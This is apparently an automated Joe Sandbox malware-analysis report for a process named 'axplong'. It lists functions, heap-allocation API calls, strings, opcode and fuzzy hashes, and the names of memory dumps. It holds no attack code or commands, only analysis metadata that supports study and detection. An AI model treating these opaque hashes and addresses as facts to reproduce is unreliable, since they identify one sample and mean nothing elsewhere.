Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: __dosmaperr
String ID:
API String ID: 2332233096-0
Opcode ID: 4353f0cd8e3316635f70d3820bbf7d6ad1a8e9a6d2c2f985e14c2c084e68e7c5
Instruction ID: 917b6fb9caa8a3e3afb14a3391e2612eb8949c8190cc88b6465b3b589ff3d00e
Opcode Fuzzy Hash: 4353f0cd8e3316635f70d3820bbf7d6ad1a8e9a6d2c2f985e14c2c084e68e7c5
Instruction Fuzzy Hash: 61418075900B84ABDB24DFB6EC519AFBBF9EF99340B10442DF456D3250EB30A904CB60

Function 001ED6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,001EA5ED,?,001E74AE,?,00000000,?), ref: 001ED731

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f944f25682d10cd616664cc6c129ec9eaf20647531ef7ea4edc3f86565c9ba72
Instruction ID: 3b934c1317ffd1fc6c6d90eff233b72e28ec76c813234a3cf339e5a7ebbf1976
Opcode Fuzzy Hash: f944f25682d10cd616664cc6c129ec9eaf20647531ef7ea4edc3f86565c9ba72
Instruction Fuzzy Hash: 25F0E931E05DA5669B313B237C06A5F7B899F917B4B198121AC08AB1C1CF31DC0042E1

Function 001EAF0B Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,1AF485F8,?,?,001CD32C,1AF485F8,?,001C78FB,?,?,?,?,?,?,001B7435,?), ref: 001EAF3E

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6c1206d1fe6492f90806890f7a9bdddcaa16d88b072ab7a9a1981a8cf0e6f5db
Instruction ID: 3e053d65f5383b353df946618180b27ec39dfdc7680fc545517b9e1a4f25f84e
Opcode Fuzzy Hash: 6c1206d1fe6492f90806890f7a9bdddcaa16d88b072ab7a9a1981a8cf0e6f5db
Instruction Fuzzy Hash: F7E02B71605ED156EB3033275C0179F76898F923B1F950150AC08970C0DF20FC0041E3

Function 04AA03C2 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 337f7f3c5bd274b668490465876b39541c0361be0dce358fab41ae7c3ba9064c
Instruction ID: 58633f6acaf7642b1596881cdc39c77738fc349ef7ce7a09dc28464dd5ebc15a
Opcode Fuzzy Hash: 337f7f3c5bd274b668490465876b39541c0361be0dce358fab41ae7c3ba9064c
Instruction Fuzzy Hash: D41128FB24D015BF71819D866A109BA6A7EF1DA771330C816F40BCB502F3952EA96131

Function 04AA03D1 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc83693bc0774d1871a232fbed053bf30c1302f41b88fac2382197d936f7956e
Instruction ID: 5b36481fa0a03393b15c8dee6221f68d47def2f5b29368a824d13940fbaffa0c
Opcode Fuzzy Hash: dc83693bc0774d1871a232fbed053bf30c1302f41b88fac2382197d936f7956e
Instruction Fuzzy Hash: E0113ABB24D015FF61819D466A106FA2A7DF1DA371330C816F40BCB502F3952AB92131

Function 04AA03E4 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb2049c56fd757557f6cdccba559ea5b3fed08e5cdfab38221db2e07d3ad41b
Instruction ID: bdb42b187f80b315db50335a822f8e67edb3eefbfb201eb5e8df9a8252565522
Opcode Fuzzy Hash: 8bb2049c56fd757557f6cdccba559ea5b3fed08e5cdfab38221db2e07d3ad41b
Instruction Fuzzy Hash: FA114CBB24D015BF71419D826A106F62A7DF1DA370330C816F40BCB502F3552EB96131

Function 04AA03F4 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eb0ece5993980b2c8c995704e8b014707bee1e77d0aed44f2d1b93f7a9ec947
Instruction ID: a4c4f3d47270000d0f3774cf6a779a3143335063c4345c03c4dd72caf3953250
Opcode Fuzzy Hash: 8eb0ece5993980b2c8c995704e8b014707bee1e77d0aed44f2d1b93f7a9ec947
Instruction Fuzzy Hash: 5C017CBB24D015BFB182AD466A105BA6A7DF1DA770330C826F40BCB502F3522EB97131

Function 04AA0408 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6437b06fa5175f641763c9d6e1bf59a911cc6ece51c5689dd0f9470000e5b4ae
Instruction ID: 2ca7c9c7a1c32dc6cad7750068a64b253a819df4cf808a7769d1c3a591f4d634
Opcode Fuzzy Hash: 6437b06fa5175f641763c9d6e1bf59a911cc6ece51c5689dd0f9470000e5b4ae
Instruction Fuzzy Hash: 070169BA24D015FF72829D465A109B66A7DF59A331320C82AF40BCB542F3612EB56132

Function 04AA0474 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feee7f1430778d1efacfa519ff4c698e47b1db9596e42f55a92e33e9f2c6f2bb
Instruction ID: cf1118e3126d5a81da3c20efc8eb0117097f7839c115113f6b9148bdfdf16c2d
Opcode Fuzzy Hash: feee7f1430778d1efacfa519ff4c698e47b1db9596e42f55a92e33e9f2c6f2bb
Instruction Fuzzy Hash: 800104B724D155AFA2825D419A00ABA7B79F6967303208416F40B8B143F3162EB56131

Function 04AA0421 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a4eb02b53edf1f595f6b91454d1a7e21af89c7139f07e5a04b0e6bbe6ecd614
Instruction ID: df25c19ea76f02b0ee6941c5759754e112ed1c5bc74c6420d6240cae22f68f38
Opcode Fuzzy Hash: 5a4eb02b53edf1f595f6b91454d1a7e21af89c7139f07e5a04b0e6bbe6ecd614
Instruction Fuzzy Hash: 5F01A2BB24D116FFB2826D869A009BA7B7DF59A370320C416F80B8B542F3522EF57131

Function 04AA0438 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d47da8d8d702037684274000af6fbc0042bd586bbae5c102960cc00f203dcc
Instruction ID: f11cfaca04eb013a03a55196514fcd640ef7ce8b145dacba941b2ce49e33a91b
Opcode Fuzzy Hash: e3d47da8d8d702037684274000af6fbc0042bd586bbae5c102960cc00f203dcc
Instruction Fuzzy Hash: 570124B760D051EFA2831D8166401F93B7AF99B3303208446F4878F507F32A2AB6B232

Function 04AA04A4 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455faab0bab95c12d678a2eb0d7f987f112354bd927105d80fdd8310d3d7c6a3
Instruction ID: f1cc702c21074a66f26b04db95051f2dde5d06c5d42f25b032b8688987fbc73e
Opcode Fuzzy Hash: 455faab0bab95c12d678a2eb0d7f987f112354bd927105d80fdd8310d3d7c6a3
Instruction Fuzzy Hash: 62F0E2B738D026EFA1822D4296101B53ABAB66B331320C507F0078B653B3162EF57531

Function 04AA048E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d954da7eb520433026ae939852ff805110e9cc0f66098a49c3b95b96548252be
Instruction ID: 7833a1806df546c60cefcd5f87bf7ddda9758c2ffe05cdb3d53d811bd4e11f1d
Opcode Fuzzy Hash: d954da7eb520433026ae939852ff805110e9cc0f66098a49c3b95b96548252be
Instruction Fuzzy Hash: 03F0A77734D115EFA1816D5255101B52AB9B66B231320C502F44797555F3222AF1B131

Function 04AA04BB Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2785143473.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4aa0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55104c7288651802a8fb19e6c7fdab46c9080ac9ff17b48ae6cbf4203587cbe6
Instruction ID: e2827b0cffda7ba39c71c9a69e483bab3f841720b4d95870649b9c6b9998915c
Opcode Fuzzy Hash: 55104c7288651802a8fb19e6c7fdab46c9080ac9ff17b48ae6cbf4203587cbe6
Instruction Fuzzy Hash: FCE026B720D412EFA1826DA255600F63BF9B97B232310C547F1478B586F30B2AF1B232

Non-executed Functions

Function 001F3068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001F31E3

Strings

1#IND, xrefs: 001F4373
1#SNAN, xrefs: 001F437A
1#INF, xrefs: 001F439E
1#QNAN, xrefs: 001F4381

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 870cf06bb3fcb3f1612a7a3867030d21e965ea369681c7ede836f7fcf10da373
Instruction ID: d409c3350b12ec9a41d838e3e6efcec8e9132142ba227e3b20eba71926c5b977
Opcode Fuzzy Hash: 870cf06bb3fcb3f1612a7a3867030d21e965ea369681c7ede836f7fcf10da373
Instruction Fuzzy Hash: 9DC23A71E0862C8FDB25CE28DD447EAB3B5EB48304F1541EADA5EE7240E774AE858F40

Function 001F2BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 69588186e71f10d82584c7e920af36a09265e3bbfa9954f41a00dcca8581a0ff
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 2FF14071E012199FDF14CFA9C8906AEF7B1FF88314F25826AE519AB345D731AE41CB90

Function 001E7D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 001E7EFF

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: da37e74ce8cee113351a0ec616bd6380258a70599bfb6c9fa9f99ab92f5eeea2
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 4651A87020CEC86AFB3C8A7B8C967BEA79AAF62300F14095DE547D76C2DB11DD449352

Function 001B4CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248dcfc6459eeb2bfe745ee48aff48524a5d50839dc0057b6a7df464ecf4d2e9
Instruction ID: 2397d0ed5f538206a124108d2d4d9ae7836e6e417607e47e7562adabb3a3460d
Opcode Fuzzy Hash: 248dcfc6459eeb2bfe745ee48aff48524a5d50839dc0057b6a7df464ecf4d2e9
Instruction Fuzzy Hash: CF225FB3F515145BDB0CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158A44

Function 001F6F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd9b1558790504e3be661753dfd8f2f5b1c01238f573db5a0b22ad0f6ab8a57
Instruction ID: f5189ad3ca1f5b8f2f23581c0a842bf590cba21da6792a081026f0b05d45962f
Opcode Fuzzy Hash: 9dd9b1558790504e3be661753dfd8f2f5b1c01238f573db5a0b22ad0f6ab8a57
Instruction Fuzzy Hash: B5B169712146089FD719CF28C486B657BE0FF45364F298658FA9ACF2E1C736E982CB40

Function 001B4AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abdb9835df3f09f8c26646c4e53ce2d36111725b8296257cb8e6bb6522866bf4
Instruction ID: 45f1162b52864aebc214e83f81cbd4152eef590473834b063be0a352f59bd697
Opcode Fuzzy Hash: abdb9835df3f09f8c26646c4e53ce2d36111725b8296257cb8e6bb6522866bf4
Instruction Fuzzy Hash: D351C17060C3928FC319CF3D811563AFFE1AF95200F084A9EE0DA87292D774DA44CBA2

Function 001F777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca6e722a26088d38318339b24a03af5ee3b112f990f037f7cffc3d209842a16
Instruction ID: 5bbd000e70ec6d6d3aa4ac26dfe4d9675894461a5adec9a328e1c835178f5f64
Opcode Fuzzy Hash: 0ca6e722a26088d38318339b24a03af5ee3b112f990f037f7cffc3d209842a16
Instruction Fuzzy Hash: AD21B673F204394B770CC47E8C572BDB6E1C68C541745823AE8A6EA2C1D968D917E2E4

Function 001F765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
